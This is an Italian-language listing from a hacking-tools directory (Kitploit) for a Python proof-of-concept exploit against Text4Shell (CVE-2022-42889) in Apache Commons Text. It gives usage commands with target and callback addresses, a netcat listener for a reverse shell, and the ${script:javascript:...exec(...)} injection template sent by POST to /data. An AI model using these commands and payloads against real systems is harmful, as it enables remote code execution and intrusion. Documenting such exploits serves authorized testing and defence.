Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
text4shell-exploit — Un exploit proof-of-concept (PoC) personalizzato basato su Python che prende di mira Text4Shell (CVE-2022-42889), una grave vulnerabilità di esecuzione remota di codice in Apache Commons Text versioni < 1.10. | Kitploit
Strumenti/GitHubGitHub/syndicate27/text4shell-exploit
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubsyndicate27/text4shell-exploit

text4shell-exploit

Un exploit proof-of-concept (PoC) personalizzato basato su Python che prende di mira Text4Shell (CVE-2022-42889), una grave vulnerabilità di esecuzione remota di codice in Apache Commons Text versioni < 1.10.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
111 anno faNon ancora revisionato
Condividi

text4shell-exploit

Un exploit proof-of-concept (PoC) personalizzato basato su Python che mira a Text4Shell (CVE-2022-42889), una vulnerabilità critica di esecuzione remota di codice in Apache Commons Text versioni < 1.10. Questo exploit mira a applicazioni Java vulnerabili che utilizzano la classe StringSubstitutor con l'interpolazione abilitata, consentendo l'iniezione di espressioni ${script:...} per eseguire comandi di sistema arbitrari.

In questo PoC, lo sfruttamento è dimostrato tramite il parametro di query data; tuttavia, il nome del parametro vulnerabile può variare a seconda dell'implementazione. Gli utenti dovrebbero adattare di conseguenza il payload e il percorso della richiesta in base alla logica dell'applicazione target.

Disclaimer: Questo exploit è fornito esclusivamente a scopo educativo e per test di penetrazione autorizzati. Usalo in modo responsabile e a tuo rischio.

Descrizione

Questo è un exploit Python3 personalizzato per la vulnerabilità di Apache Commons Text nota come Text4Shell (CVE-2022-42889). Consente l'esecuzione remota di codice (RCE) tramite interpolatori non sicuri quando l'input utente viene valutato dinamicamente da StringSubstitutor.

Testato su:

  • Apache Commons Text < 1.10.0
  • Applicazioni Java che utilizzano l'interpolazione da input non attendibili
${script:...}

Utilizzo

root@kitploit:~
python3 text4shell.py <target_ip> <callback_ip> <callback_port>

Esempio

root@kitploit:~
python3 text4shell.py 127.0.0.1 192.168.1.2 4444

Assicurati di impostare un listener sulla tua macchina attaccante:

root@kitploit:~
nc -nlvp 4444

Logica del Payload

Lo script inietta:

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}

La reverse shell viene inviata tramite il parametro /data utilizzando una richiesta POST.

Scarica lo strumento